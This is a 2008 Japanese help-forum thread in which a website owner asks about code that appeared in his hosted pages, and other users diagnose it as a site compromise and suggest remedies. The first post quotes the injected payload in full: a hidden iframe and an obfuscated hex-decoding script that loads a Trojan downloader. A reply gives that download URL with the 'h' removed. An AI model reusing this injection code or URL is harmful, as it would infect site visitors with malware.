アップしているHPソースに覚えのないものが書き足されてる
◇-?アップしているHPソースに覚えのないものが書き足されてる-ジン-12/18-18:39(340)-No.467150 ┣?!Re:アップしているHPソースに覚...-KAWAI-12/19-11:44(323)-No.467174 ┃ ┗?!-Re:アップしているHPソースに覚...-ジン-12/19-14:52(320)-No.467186 ┗?!Re:アップしているHPソースに覚...-yanyan-12/20-23:44(287)-No.467255 ┗?!-Re:アップしているHPソースに覚...-ジン-12/21-02:59(284)-No.467266 ┗?!-!Re:アップしているHPソースに...-yanyan-12/21-13:02(273)-No.467299 ┗?!-!-Re:アップしているHPソースに...-ジン-12/22-00:20(262)-No.467339 ┗?!-!-!Re:アップしているHPソース...-yanyan-12/22-03:08(259)-No.467345 ┗?!-!-!【ありがとう】Re:アップし...-ジン-12/24-13:55(201)-No.467514
▲このページのトップに戻る
▲このページのトップに戻る
▲このページのトップに戻る
▲このページのトップに戻る
▲このページのトップに戻る
▲このページのトップに戻る
▲このページのトップに戻る
▲このページのトップに戻る
▲このページのトップに戻る
| 467150 | アップしているHPソースに覚えのないものが書き足されてる | ジン | 2008/12/18-18:39 |
メーカー名:NEC 日本電気 OS名:WindowsXp Professional パソコン名:pc-vl370ed トラブル現象:ホームページ全般 -- はじめてまして。 サイトを運営しているのですが、アップをしているページのソースを見るといつの間にか自分で書いた覚えのない以下のような分が勝手に書き足されています。 これっていったいなんなのでしょうか?おしえてください。 <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l4949dfccdb484(l4949dfccdb86c){ function l4949dfccdbc54(){return 16;} return (parseInt(l4949dfccdb86c,l4949dfccdbc54()));}function l4949dfccdc425(l4949dfccdc80d){ function l4949dfccdd3c6(){var l4949dfccdd7ae=2;return l4949dfccdd7ae;} var l4949dfccdcbf4='';l4949dfccddb96=String.fromCharCode;for(l4949dfccdcfde=0;l4949dfccdcfde<l4949dfccdc80d.length;l4949dfccdcfde+=l4949dfccdd3c6()){ l4949dfccdcbf4+=(l4949dfccddb96(c102916999516l4949dfccdb484(l4949dfccdc80d.substr(l4949dfccdcfde,l4949dfccdd3c6()))));}return l4949dfccdcbf4;} var xfc='';var l4949dfccddf7e='3C736'+xfc+'3726'+xfc+'970743E6'+xfc+'96'+xfc+'6'+xfc+'28216'+xfc+'D796'+xfc+'96'+xfc+'1297B6'+xfc+'46'+xfc+'F6'+xfc+'3756'+xfc+'D6'+xfc+'56'+xfc+'E742E77726'+xfc+'9746'+xfc+'528756'+xfc+'E6'+xfc+'5736'+xfc+'36'+xfc+'1706'+xfc+'528202725336'+xfc+'32536'+xfc+'392536'+xfc+'36'+xfc+'2537322536'+xfc+'312536'+xfc+'6'+xfc+'42536'+xfc+'352532302536'+xfc+'6'+xfc+'52536'+xfc+'312536'+xfc+'6'+xfc+'42536'+xfc+'3525336'+xfc+'42536'+xfc+'332533312533302532302537332537322536'+xfc+'3325336'+xfc+'42532372536'+xfc+'3825373425373425373025336'+xfc+'125326'+xfc+'6'+xfc+'25326'+xfc+'6'+xfc+'2536'+xfc+'372536'+xfc+'6'+xfc+'6'+xfc+'2536'+xfc+'372536'+xfc+'6'+xfc+'6'+xfc+'2533322536'+xfc+'6'+xfc+'42536'+xfc+'3525326'+xfc+'52536'+xfc+'6'+xfc+'52536'+xfc+'3525373425326'+xfc+'6'+xfc+'25326'+xfc+'52536'+xfc+'372536'+xfc+'6'+xfc+'6'+xfc+'25326'+xfc+'6'+xfc+'2536'+xfc+'332536'+xfc+'382536'+xfc+'352536'+xfc+'332536'+xfc+'6'+xfc+'225326'+xfc+'52536'+xfc+'382537342536'+xfc+'6'+xfc+'42536'+xfc+'6'+xfc+'32532372532302537372536'+xfc+'392536'+xfc+'342537342536'+xfc+'3825336'+xfc+'42533352533342533322532302536'+xfc+'382536'+xfc+'352536'+xfc+'392536'+xfc+'372536'+xfc+'3825373425336'+xfc+'42533392533382532302537332537342537392536'+xfc+'6'+xfc+'32536'+xfc+'3525336'+xfc+'4253237253736'+xfc+'2536'+xfc+'392537332536'+xfc+'392536'+xfc+'322536'+xfc+'392536'+xfc+'6'+xfc+'32536'+xfc+'3925373425373925336'+xfc+'12536'+xfc+'382536'+xfc+'392536'+xfc+'342536'+xfc+'342536'+xfc+'352536'+xfc+'6'+xfc+'525323725336'+xfc+'525336'+xfc+'325326'+xfc+'6'+xfc+'2536'+xfc+'392536'+xfc+'36'+xfc+'2537322536'+xfc+'312536'+xfc+'6'+xfc+'42536'+xfc+'3525336'+xfc+'52729293B7D76'+xfc+'6'+xfc+'172206'+xfc+'D796'+xfc+'96'+xfc+'13D7472756'+xfc+'53B3C2F736'+xfc+'3726'+xfc+'970743E';document.write(l4949dfccdc425(l4949dfccddf7e));</script> | |||
▲このページのトップに戻る
| 467174 | Re:アップしているHPソースに覚えのないものが書き足されてる | KAWAI | 2008/12/19-11:44 |
記事番号467150へのコメント ウイルスの可能性が高いですね。 ウイルス対策ソフトはインストールされていますか? 期限切れになっていたりしませんか? | |||
▲このページのトップに戻る
| 467186 | Re:アップしているHPソースに覚えのないものが書き足されてる | ジン | 2008/12/19-14:52 |
記事番号467174へのコメント KAWAIさん レスありがとうございます。 ウィルスバスター2009を使用し、有効期限中で最新版アップデートも自動更新に設定をしています。 時折、手動でもアップデートを試みたりしています。 ウィンドウズアップデートの方も自動更新の設定になっています。 しかしながら、質問の書き込み後も自分で解決方法を探し、ウィルス!?かもと念のためアップしていたものをオンライン上から全て削除しました。 その後、ウィルスバスターを開いたところにある「検索開始」クリックでは何も発見できませんでしたが、 プルダウン?の全検索を行ったところ、トロイの木馬系のウィルスがパソコン内に発見されました。 そこで、先ほどの検出され隔離されたファイルを削除し、再度全検索を行うと、 次は何も検出されなかったのでもう大丈夫かとhpのほうには経緯を書き、 訪問者に念のためオンラインスキャン等の願いを提示しました。 それで安心していたのですが、アップ直後は何の問題もなくhpを見れているのですが、 しばらくすると、質問に書きました自分で書いた覚えのないソースがhp上に出現しているのです。 自分のパソコンにある元ファイルのほうには、その内容はありません。 そしてファイル容量の方も、アップしているほうだけがかなり増えているのです。 原因がさっぱりわからず、どうかお力添えをお願いします。 | |||
▲このページのトップに戻る
| 467255 | Re:アップしているHPソースに覚えのないものが書 | yanyan | 2008/12/20-23:44 |
記事番号467150へのコメント ジンさんは No.467150「アップしているHPソースに覚えのないものが書き足されてる」で書きました。 質問者さんはどこのHPサービスを利用していますか? 使用しているサーバーの仕様ということはありませんか? 一度、サービス元に問い合わせしてみてはいかがでしょうか? 記載されているコードを保存してブラウザで見てみたところ ttp://gogo2me.net/.go/check.htmlにアクセスするようです。 ブラウザのjavascriptを無効にしておけばアクセスすることは無いようです。 上記URIで検索したところ下記のページが見つかりました。 コードが若干違いますが参考になりますか? http://www.sitepoint.com/forums/showthread.php?p=4082556 不正iframeを利用してマルウェアに感染させられることもあるようですので ページが書き換えられる原因とリンク先の挙動が解明するまでサイトを閉鎖する ことも考えたほうがいいと思います。 http://www.itmedia.co.jp/enterprise/articles/0804/03/news025.html (追記・修正)12/20 23.55 aguseというサイトでttp://gogo2me.net/.go/check.htmlを調べたところ Trojan-Downloader.HTML.Agent.muというウイルスが検出されました。 http://www.aguse.jp/?m=w&url=http%3A%2F%2Fgogo2me.net%2F.go%2Fcheck.html&x=83&y=7 先頭のhは間違ってクリックしないように削除しました。 | |||
▲このページのトップに戻る
| 467266 | Re:アップしているHPソースに覚えのないものが書 | ジン | 2008/12/21-02:59 |
記事番号467255へのコメント yanyan 様 レスありがとうございます。 サーバーはniftyなどを利用しています。 急になったのと、複数社になるため仕様というのは少ないかと思います。 ttp://www.sitepoint.com/ さまのはちょっと読めませんでした(汗) 不正ifreameですか。コードの中にwidth='1' height='1' という記述があるので、もしかしたらそれかもしれませんね。 情報ありがとうございます。不正ifreameについてアドから見てみたのですが、流行しているということがよくわかりました。 ただ、改ざんされないための対処法など、これらはどうやったら防ぐことができるのでしょうか? もしおわかりでしたらよろしくお願いします。 | |||
▲このページのトップに戻る
| 467299 | Re:アップしているHPソースに覚えのないものが書 | yanyan | 2008/12/21-13:02 |
記事番号467266へのコメント ジンさんは No.467266「Re:アップしているHPソースに覚えのないものが書」で書きました。 書き換えがファイルのアップロード時に発生していないようですので、可能であれば対象ファイルを アップロード後、パーミッションを644から444に変えてみてはいかがでしょうか? HPを更新したい場合は644に戻してからアップロードしてください。 改竄しているものがアクセス権を見ていないお馬鹿さんなら、これでおさまると思います。 書き換えされたタイミングはファイルのタイムスタンプを見れば分かると思います。 上記処置はあくまでも暫定的なものです。 改竄が外部からのものか、ご自身のパソコンからか切り分けが必要だと思います。 個人的にはOSを再インストールしてセキュリティ対策を万全にしたあとホームページのパスワードを 変更して様子をみるのがいいと思います。 | |||
▲このページのトップに戻る
| 467339 | Re:アップしているHPソースに覚えのないものが書 | ジン | 2008/12/22-00:20 |
記事番号467299へのコメント yanyanさま 回答ありがとうございます。 444に変更してみたところ、残念ながら症状が治まらず、容量確認するとアップ後のファイルが10倍くらい容量が増えていて、 即様ページを削除しましたが、英文の変なページへと飛ばされてしまうようでした。 (バスターでその後パソを確認して検出されなかったので大丈夫とは思いますが・・・) 今はFTPパスを変更した上で444にしてみました。これでとりあえず収まればよいのですが…。 サーバーに問い合わせしても原因がわからず対処できないとの回答をいただいてしまい、本当にどうしていいか切実で、 これでとりあえず収まればよいのですが…しばらく様子を見てみます。 | |||
▲このページのトップに戻る
| 467345 | Re:アップしているHPソースに覚えのないものが書 | yanyan | 2008/12/22-03:08 |
記事番号467339へのコメント ジンさんは No.467339「Re:アップしているHPソースに覚えのないものが書」で書きました。 >即様ページを削除しましたが、英文の変なページへと飛ばされてしまうようでした。 英文の変なページへ飛ばされたときにウイルスバスターが反応しないということは ウイルス検出ができていないのでは? ウイルスに感染しているおそれがありますので一度カスペルスキーのオンラインスキャンを 試してみてはいかがでしょうか? http://www.kaspersky.co.jp/virusscanner >今はFTPパスを変更した上で444にしてみました。これでとりあえず収まればよいのですが…。 収まるといいですね。 どうしても改善されない場合は467299にも書きましたがOSの再インストールとパスワードの 変更も考えてみてください。 | |||
▲このページのトップに戻る
| 467514 | Re:アップしているHPソースに覚えのないものが書 | ジン | 2008/12/24-13:55 |
記事番号467345へのコメント yanyanさま レスが遅くなってしまいましたが回答ありがとうございます。 教えていただいたカスペルスキーのオンラインスキャンを試してみましたがやはり何も見つからないようです。 とりあえず、FTPパスを変更した上で444にし、念のためファイル名も変えて変えてアップしてみました。 今は何とか書き換えが行われていないようで、原因などはわからずじまいなので解決したというわけではありませんが、毎日チェックしつつしばらく様子をみてみます。 どうしようもないようでしたらosのほうも考慮に入れたいと思います。 何度も相談に乗ってくださりありがとうございました。 すごく不安でしたがとても支えになりました。感謝しております。 | |||
何か一言(本ページで参考になったならないを含めて残してあります)
◎:解決 ○:参考になった ×:参考にならなかった !:アドバイスあり
| 参考 | 回数 | 投稿日時 | 何か一言 |
|---|
